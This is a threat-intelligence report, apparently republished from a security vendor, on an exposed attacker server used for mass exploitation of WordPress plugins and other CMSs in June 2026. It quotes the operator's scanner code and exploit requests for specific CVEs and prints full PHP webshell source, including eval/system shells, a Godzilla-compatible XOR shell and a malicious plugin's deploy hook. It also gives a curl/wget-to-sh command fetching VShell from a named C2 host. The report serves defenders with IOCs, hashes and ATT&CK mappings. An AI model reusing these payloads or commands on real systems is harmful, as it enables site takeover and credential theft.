

























Found on the Hunt.io platform, an exposed Linux working directory provided a detailed record of a mass web-exploitation operation active in June 2026:
AttackCapture™
The collection held target lists IPs and URLs from FOFA, custom vulnerability scanners, exploit scripts, uploaded PHP payloads, shell inventories, post-exploitation tooling, execution logs, archives, and 2,000 lines of root shell history.
Across 18 documented scanner runs, the operator generated 850k+ attempt records against 442k+ deduplicated vulnerability–site pairs.
Across all surviving evidence, 25,195 unique normalised sites carry confirmed or validated compromise evidence. To validate whether your website was targeted, compromised or suspected, please see our Exposure Checker
Read together, the files describe a repeatable workflow:
The strongest activity centred on WordPress. Breeze Cache, ThemeREX Addons, Simple File List, BerqWP, Custom CSS JS & PHP, WavePlayer, Ninja Forms, Gravity Forms, WPBookit, and vulnerable plugin-installation routes were all incorporated into the workflow.
The same server also held exploitation tooling for PrestaShop, Joomla, MetInfo, Craft CMS, Magento, Nacos, and other applications.
FOFA was the main target source visible in the workspace. The operator stored a FOFA configuration file and repeatedly generated product-specific lists.
The largest surviving target files were joomla_mega_targets.txt with 587,034 lines, all_scan_targets.txt with 508,729, new_batch_658k.txt with 276,480, and fofa_new_domains.txt with 201,356. Product-specific files included 46,648 ThemeREX targets, 45,057 Breeze targets, and 44,786 Ninja Forms URLs.
The lists mix domains, IP addresses, schemes, ports, aliases, and duplicate observations. The operator was aware of this problem and repeatedly normalised the pools:
cat /opt/wp-rce-scan/mega_targets.txt \
/root/all_fofa_classified_final.txt \
/root/fofa_new_domains.txt \
/root/all_scan_targets.txt 2>/dev/null |
sed 's/\t.*//' |
sort -u |
grep -v '^$' |
grep -v '^\.' > /tmp/all_domains_raw.txt
Previously scanned domains were then removed:
cut -f1 /root/results/ALL_DOMAINS_CLASSIFIED_V3.txt |
sort -u > /tmp/scanned_63k.txt
comm -23 /tmp/all_domains_raw.txt /tmp/scanned_63k.txt \
> /root/new_batch_658k.txt
The threat actor leveraged known CVEs in web-apps, primarily Wordpress plugins, in order to gain initial access. We will discuss the success of each CVE for exploitation later:
The shell history records a progression from single-target testing to detached, parallel jobs.
An early WordPress scanner ran with 50 workers:
cd /opt/wp-rce-scan &&
nohup python3 wp_rce_scan.py \
-f targets.txt \
-t 50 \
-o wp_rce_shells.txt \
> scan.log 2>&1 &
Later jobs used 100, 150, 200, 300, and 500 workers. Separate exploit families were launched in concurrent screen sessions:
screen -dmS m1 bash -c \
"python3 wp_batch_rce_v2.py ... -e sfl ..."
screen -dmS m2 bash -c \
"python3 wp_batch_rce_v2.py ... -e ninjaforms ..."
screen -dmS m3 bash -c \
"python3 wp_batch_rce_v2.py ... -e wpfileupload ..."
screen -dmS m4 bash -c \
"python3 wp_batch_rce_v2.py ... -e dragdrop ..."
screen -dmS m5 bash -c \
"python3 wp_batch_rce_v2.py ... -e fileaway ..."
By the time Ctrl-Alt-Intel recovered and dumped the open-directory, the exploitation script used was
wp_rce_v8.py. Evidence suggests the threat actor heavily leveraged AI in development of scripts:
AI developed Wordpress RCE script
The operator watched output as it accumulated:
tail -5 /root/batch_nfwp.log
wc -l /root/downphp_shells.txt /root/nfwp_shells.txt
ps aux | grep batch_nfwp | grep -v grep
screen -ls
Response checks, filenames, worker counts, and payload formats were edited between runs:
sed -i "s|THREADS = 20|THREADS = 50|" \
/root/CVE-2025-34085.py
sed -i \
"s/filename = \"\.brq-{}\.txt\"/filename = \"brq_{}.css\"/" \
berqwp_v2.py
sed -i \
"s/if MARKER in body:/if MARKER in body and len(body) < 100:/g" \
customcss_v2.py
sed -i 's|THREADS = 100|THREADS = 150|' \
/root/batch_downphp_v2.py
This iteration reduced false positives and adapted payloads to extension filters or response behaviour observed during live runs.
The most common route to execution was an unauthenticated file-handling function that accepted PHP, accepted an alternative executable extension, or could be made to retrieve an attacker-controlled file.
Marker shells commonly followed this pattern:
<?php echo "MARKER"; @eval($_POST["x"]); ?>
The marker identified the request and gave the scanner an exact value to seek in the uploaded response. A returned marker showed that the server had interpreted the uploaded file as PHP.
Successful paths were merged and rechecked:
cat downphp_shells.txt nfwp_shells.txt |
grep -i .php |
sort -u > all_shells_raw.txt
nohup python3 /root/verify_shells.py \
> /root/verify_result.txt 2>&1 &
The operator eventually combined results from otherwise separate campaigns:
cat /root/*_shells.txt \
/opt/wp-rce-scan/mega_*_shells.txt 2>/dev/null |
sed "s|https\?://||" |
sed "s|/.*||" |
sort -u |
wc -l
The table below covers the completed campaigns for which a target cohort and outcome evidence survive.
| Vulnerability or chain | Attempts | Confirmed | Validated | Suspected only |
|---|---|---|---|---|
| Joomla JCE, locally mapped to CVE-2026-48907 | 561,864 | 0 | 77 | 3,104 |
| MetInfo CMS, CVE-2026-29014 | 47,988 | 9 | 0 | 0 |
| WordPress ThemeREX Addons, CVE-2026-1969 | 46,648 | 3,378 | 36 | 24,261 |
| WordPress Breeze Cache, CVE-2026-3844 | 45,057 | 17,064 | 0 | 2,807 |
| WordPress Ninja Forms File Uploads, CVE-2026-0740 | 44,786 | 0 | 116 | 0 |
| Craft CMS, CVE-2025-32432 | 44,724 | 0 | 0 | 1 |
| GutenKit/Hunk plugin installation, unmapped | 11,360 | 0 | 14 | 0 |
| WordPress Alone theme, CVE-2025-5394 | 9,439 | 0 | 3 | 43 |
| WordPress Custom CSS JS & PHP, CVE-2026-6433 | 7,474 | 452 | 0 | 2,115 |
| WordPress WavePlayer, CVE-2025-12057 | 6,001 | 261 | 0 | 4,237 |
| WordPress Sneeit Framework, CVE-2025-6389 | 5,538 | 0 | 0 | 11 |
| WordPress Simple File List, CVE-2025-34085 | 4,995 | 2 | 178 | 0 |
| WordPress BerqWP, CVE-2025-7443 | 4,486 | 368 | 4 | 2,122 |
| WordPress WPvivid Backup, CVE-2026-1357 | 4,019 | 0 | 0 | 471 |
| WordPress Gravity Forms SSRF, CVE-2025-12352 | 4,004 | 30 | 0 | 0 |
| PrestaShop AP Page Builder, CVE-2024-6648 | 1,444 | 423 | 15 | 102 |
| Pay-UZ, CVE-2026-31843 | 900 | 0 | 0 | 94 |
| WordPress WPBookit, CVE-2025-7852 | 97 | 4 | 0 | 55 |
The directory also contains PoCs and partially operationalised code for WP File Manager, WP File Upload, WP Time Capsule, ACF Extended, Multi Uploader for Gravity Forms, Everest Forms Pro, User Registration Advanced Fields, Drag and Drop Multiple File Upload for Contact Form 7, Kali Forms, Filester, File Away, Magento, Nacos, MaxSite CMS, and ThinkPHP.
Those components are excluded from the campaign-success totals because the retained evidence does not establish or log a confirmed or validated compromise set.
Breeze produced the largest confirmed result set.
Breeze Cache - CVE-2026-3844
The exploit supplied an attacker-controlled URL to one of two AJAX actions:
action=breeze_fetch_gravatar
action=fetch_gravatar_from_remote
The vulnerable WordPress server retrieved the remote file and stored it beneath:
/wp-content/uploads/breeze/gravatars/
The scanner generated a marker-specific payload URL:
payload_url = "{}/{}.php".format(
PAYLOAD_SERVER,
MARKER,
)
code, body = do_req(
ajax_url,
{
"action": "breeze_fetch_gravatar",
"gravatar_url": payload_url,
},
)
PHP and PHTML variants were requested after upload. The response had to contain the corresponding marker before the site entered the confirmed tier.
The operator launched the campaign with a local payload server:
nohup python3 /root/breeze_payload_server.py 8888 \
> /dev/null 2>&1 &
nohup python3 /root/breeze_mass.py \
http://127.0.0.1:8888 \
/root/breeze_targets.txt \
80 > /root/breeze_scan.log 2>&1 &
Within the surviving target cohort, 17,064 of 27,879 deduplicated sites produced confirmed evidence.
Common filenames included:
BZ_slnm8o.phtml
BZ_v739z6.phtml
BZ_slnm8o.php
BZ_v739z6.php
ThemeREX exploitation used:
action=trx_addons_uploads_save_data
The request declared the payload as an image while supplying PHP:
files = {
"file": (
"{}.php".format(MARKER),
shell_content,
"image/jpeg",
)
}
Observed destinations included:
/wp-content/uploads/trx_addons/
/wp-content/uploads/YYYY/MM/
/wp-content/uploads/
The reconciled run contains 3,378 confirmed and 36 validated sites.
Simple File List used a two-request chain.
Simple File List - CVE-2025-34085
The first request uploaded attacker content as a PNG:
/wp-content/plugins/simple-file-list/ee-upload-engine.php
The second renamed the file to PHP:
/wp-content/plugins/simple-file-list/ee-file-engine.php
The rename request supplied:
data = {
"eeListFolder": "/",
"eeFileOld": f"{filename}.png",
"eeFileAction": f"Rename|{new_name}",
}
Resulting shells were generally placed under:
/wp-content/uploads/simple-file-list/
Saved post-exploitation output confirms that selected Simple File List victims were queried for:
idwp-config.phpA persistent shell was written as:
/wp-content/uploads/.bd.php
BerqWP was attacked through:
/wp-content/plugins/berqwp/store_javascript_cache.php
The multipart request labelled PHP as JavaScript:
filename = ".brq-{}.php".format(MARKER)
headers = {
"Content-Type":
"multipart/form-data; boundary={}".format(boundary)
}
The most common destination was:
/wp-content/cache/berqwp/.brq-<marker>.php
The reconciled run contains 368 confirmed and four validated sites.
This campaign used an unauthenticated SQL injection exposed through:
action=fc_ajax_call
operation=wce_editor_inline_code
The injected row supplied PHP that the plugin later evaluated. The evaluated code wrote another PHP file:
shell_content = (
'<?php echo "{m}";'
'@eval($_POST["x"]);?>'
).format(m=MARKER)
write_code = (
'<?php file_put_contents('
'$_SERVER["DOCUMENT_ROOT"] . "/{f}",'
'"{s}"); ?>'
).format(
f=shell_filename,
s=shell_content,
)
Dedicated post-exploitation logs contain command output from 17 sites. Eight persistent shells were recorded, commonly at:
/wp-content/uploads/.wp-log.php
The reconciled campaign contains 452 confirmed sites.
WavePlayer used waveplayer_create_local_copy to create executable files beneath the plugin’s upload directory. The reconciled evidence contains 261 confirmed sites.
Ninja Forms used upload actions including:
nf_upload_file
nf_fu_upload
The surviving run contains 116 validated sites. Common destinations included:
/wp-content/uploads/ninja-forms/
/wp-content/uploads/ninja-forms/tmp/
Gravity Forms used a server-side image retrieval function to fetch an attacker-hosted PHP payload. Thirty sites returned the expected panel evidence.
WPBookit used an unauthenticated booking-type image upload. Four sites in the surviving target cohort produced confirmed evidence.
Two chains installed attacker-hosted ZIP files.
The Alone theme campaign retrieved:
http://137.175.93[.]126:8080/xs.zip
The archive contained xs/xs.php, a compact command and PHP-evaluation shell:
<?php
if (isset($_POST['x'])) {
eval($_POST['x']);
die();
}
if (isset($_GET['x'])) {
system($_GET['x']);
die();
}
echo "404";
?>
The GutenKit/Hunk chain used:
/wp-json/gutenkit/v1/install-active-plugin
/wp-json/hc/v1/themehunk-import
to install:
http://137.175.93[.]126:8877/shell-deploy.zip
Fourteen plugin-directory shells were recorded. The malicious plugin copied embedded shell code into its plugin directory, the uploads directory, and the active theme:
register_activation_hook(
__FILE__,
'shell_deploy_init'
);
$upload_dir = wp_upload_dir();
$shell_path =
$upload_dir['basedir'] .
'/.sd_' .
substr(md5(time()), 0, 8) .
'.php';
file_put_contents($shell_path, $shell);
file_put_contents(
plugin_dir_path(__FILE__) . '.sd.php',
$shell
);
new_shell.php, new_shell_bypass.php, and new_shell_short.php implement a concealed file-management panel.
Capabilities include:
The shared password is:
Authentication uses POST parameter k:
@session_start();
@set_time_limit(0);
error_reporting(0);
http_response_code(404);
$p_a_s_s_k_e_y = "GQxcpCNmqW";
if (
isset($_POST['k']) &&
$_POST['k'] === $p_a_s_s_k_e_y
) {
$_SESSION['a_u_t_h'] = 1;
}
gls.php and gls_fixed.php implement an encrypted session shell compatible with the Godzilla protocol.
The shell uses POST parameter xxscgfg123123, XOR key 3c6e0b8a9c15224a, and the session payload name payload.
The shell base64-decodes and XOR-transforms attacker data before storing or evaluating a session payload:
$pass = 'xxscgfg123123';
$payloadName = 'payload';
$key = '3c6e0b8a9c15224a';
if (isset($_POST[$pass])) {
$data = encode(
base64_decode($_POST[$pass]),
$key
);
if (isset($_SESSION[$payloadName])) {
$payload = encode(
$_SESSION[$payloadName],
$key
);
eval($payload);
}
}
down.php is a large obfuscated PHP webshell with multiple capabilities, protected by the password:
Its visible wrapper decodes a transformed blob and evaluates the result:
<?php
$password = "sfssfdgfd1212313";
$data = "[transformed blob]";
$uri = pack("H*", str_rot13($data));
eval($uri);
Late in the activity, the operator attempted to place this panel through several vulnerability families and then merged every URL ending in down.php.
The down.php webshell was the most capable and sophisticated we had observed. It appeared to evolve from open-source Chinese-developed BestShell, which natively supported both Linux and Windows:
The webshell came in-built with set commands that could be run:
In-build commands
These included the creation of mysql$ user account with credential envl. Additionally, the web-shell could enumerate EDR/AV installations and Windows hotfixes to identify known vulnerabilities:
Hotfixes
AV/EDR enumeration
We could dedicate a whole blog to the analysis of the capabilities of down.php, however this is not in the scope.
A very surprising find was the execution of the below VShell command within the threat actors .bash_history file. Typically, we see VShell deployed to victim machines for C2, however here the threat actor is enrolling their VPS.
(curl -fsSL -m180 http://xs.xxooonline.eu.cc:8080/slw||
wget -T180 -q http://xs.xxooonline.eu.cc:8080/slw)|sh
The /slw response is an architecture-aware shell script. It tests writable locations, determines whether the host is x86-64, x86, ARM64, or ARM, downloads a corresponding ELF, saves it as 0e654492ws, and starts it with nohup:
linux.sh
These are SNOWLIGHT payloads, which act as a dropper for VShell
C2: xs.xxooonline.eu[.]cc
Port: 8080
Protocol: WebSocket
The saved Simple File List report dates confirmed exploitation to June 11, 2026. Target generation, vulnerability testing, malicious ZIP retrieval, and scanner development continued over the following days.
On June 15, the HTTP log records the first retrievals of new_shell.php, new_shell_bypass.php, and new_shell_short.php.
From June 15 through June 20, the retained logs and command history show Breeze, ThemeREX, BerqWP, WavePlayer, Custom CSS JS & PHP, Ninja Forms, Gravity Forms, PrestaShop, Joomla, shell consolidation, and post-exploitation activity.
Payload retrieval and scanner activity continued through June 21.
We assess with medium-high confidence that the mass-exploitation activity was conducted by a Chinese actor or Chinese-speaking operator. The strongest evidence is fluent Simplified Chinese in campaign-specific scripts and interactive .bash_history entries, including 域名去重 (“domain deduplication”), 随便找一个Breeze域名 (“find any Breeze domain”), 进程状态 (“process status”), and FOFA扫描日志 (“FOFA scan log”).
The operator also built dedicated workflows for deploying Godzilla (哥斯拉) webshells and relied extensively on FOFA. The recovered SNOWLIGHT chain delivered VShell, a remote-access tool frequently used by Chinese groups and developed within a Chinese-speaking community.
| Indicator | Context |
|---|---|
137.175.93[.]126 |
exploitation and payload-hosting infrastructure |
xs.xxooonline.eu[.]cc |
Operator-side VShell C2 |
43.108.17[.]80 |
Observed A-record for the operator-side VShell C2 |
Recurring filenames include:
.bd.php
.wp-log.php
.sys_log.php
sfl_bk.php
.auto.php
.sd.php
.sd_*.php
.leo_*.php
.brq-*.php
.wvp-*.php
.cc-*.php
.nf-log.php
Recurring directories include:
/wp-content/uploads/breeze/gravatars/
/wp-content/uploads/trx_addons/
/wp-content/cache/berqwp/
/wp-content/uploads/simple-file-list/
/wp-content/uploads/ninja-forms/
| File | SHA-256 |
|---|---|
down.php |
84F7E396A48913851A10CC78C5CC22A25634564ABD0694465236D2F365E2BDEE |
new_shell.php |
E4AD72B1D7A727FFCCF0E2A9DDF7B08C993826C17EB4B9F49C9734FC54B00B2A |
new_shell_bypass.php |
58B17EF746D6FCD9F2E5738486D5AF7C4C02B6732176369536B9782D644EC119 |
new_shell_short.php |
F14285507192FB7643597E4FFAAB006F9A3021E045999C1114E4E37BDA843B18 |
loader_shell.php |
36BE47426E90899C56221F9521DDE0A20BE3AEFE780753C7DBE8EFEE4D59916E |
gls.php |
54953D3EECC8887F39AC0FDA4D33C84BCB6170144DBD1D133470D757595BEAEC |
gls_fixed.php |
0B23404491CAFF35FD5A7A3A3D89F66A5FB48F4BAA57B6C450C15230A0D53181 |
xs.zip |
7496C08E0BB24A89814AC83F83551D8159802EA91789C2BE8BB8C9E57C6C3264 |
shell-deploy.zip |
65E8F2315488670526F055169D7D8496C63A39C452ED74CAE2DA1CB0193969B0 |
| Tactic | ID | Technique | Observed use |
|---|---|---|---|
| Reconnaissance | T1595.002 | Active Scanning: Vulnerability Scanning | FOFA-derived target pools and parallel vulnerability scanners |
| Resource Development | T1588.005 | Obtain Capabilities: Exploits | Public PoCs adapted into mass scanners |
| Initial Access | T1190 | Exploit Public-Facing Application | WordPress plugin/theme and adjacent CMS exploitation |
| Execution | T1059.004 | Unix Shell | Commands issued through PHP shells and local operator sessions |
| Persistence | T1505.003 | Web Shell | PHP and PHTML shells in uploads, caches, plugins, themes, and web roots |
| Persistence | T1098 | Account Manipulation | WordPress administrator-creation chains present in the tooling |
| Defence Evasion | T1036 | Masquerading | Hidden filenames and HTTP 404 camouflage |
| Defence Evasion | T1027 | Obfuscated Files or Information | Obfuscated PHP, base64 payloads, and XOR shell traffic |
| Credential Access | T1552.001 | Credentials in Files | wp-config.php, .env, database, token, and key collection |
| Discovery | T1082 | System Information Discovery | OS, kernel, hostname, PHP, and architecture checks |
| Discovery | T1087.001 | Local Account Discovery | id, whoami, and /etc/passwd |
| Discovery | T1016 | System Network Configuration Discovery | Internal address and interface collection |
| Discovery | T1083 | File and Directory Discovery | Web-root, configuration, writable-directory, and neighbouring-site searches |
| Collection | T1005 | Data from Local System | Application configuration and credentials collected from selected hosts |
| Command and Control | T1105 | Ingress Tool Transfer | PHP and ZIP payload transfer |
| Command and Control | T1071.001 | Web Protocols | HTTP used for staging, shell control, and callbacks |
此内容由惯性聚合(RSS阅读器)自动聚合整理,仅供阅读参考。 原文来自 — 版权归原作者所有。